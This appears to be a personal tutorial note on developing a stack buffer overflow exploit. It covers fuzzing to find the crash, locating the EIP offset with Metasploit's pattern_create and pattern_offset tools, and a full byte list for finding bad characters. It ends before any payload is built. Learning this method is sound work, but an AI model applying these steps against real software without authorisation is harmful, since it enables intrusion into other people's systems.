So whole sections continues to be a chaos. So instead of repairing the broken chapters I am just going to start writing a new, and see if I can have it make more sense this time.
You have an application that you know is vulnerable to a buffer overflow. These are the steps to exploit it:
- Find the buffer overflow
- Find exact offset
- Identify bad characters
First we need to find where it is. We can do that by progressivly add more bytes and then attach the process to a debugger (immunity, olly). Then we just probe the application with more and more bytes until we reach the limit where the application crashes.
Now we need to know exactly where the offset is. We can do that using some metasploit tools. We create a fuzzing payload lke this
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700
This will return something like this:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A...
So we modify our exploit-script and add the fuzzer-payload as our payload. We run it again and look for where it crashes in out debugger.
We take that hex and check with another metasploit tool to know the exact offset. Like this
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 700
# Stdout
[*] Exact match at offset 605
So now we know the exact offset. This means that we know where we have the EIP. We can now modify our exploit-script to place a uniq string in the EIP to make sure everything is working as expected.
Now it is time to start developing our malicious payload. But before we do that we need to know what bad characters we have, so we can avoid them. We can do that by sending all characters to the buffer and see how the application reacts to it.
Here are all characters, from x01 to xff. If the application removes it or something like that we know it is a bad character.
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1 \xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4 \xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7 \xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
Common bad characters are x00 - Null byte x0a - New line x0d - Carriege return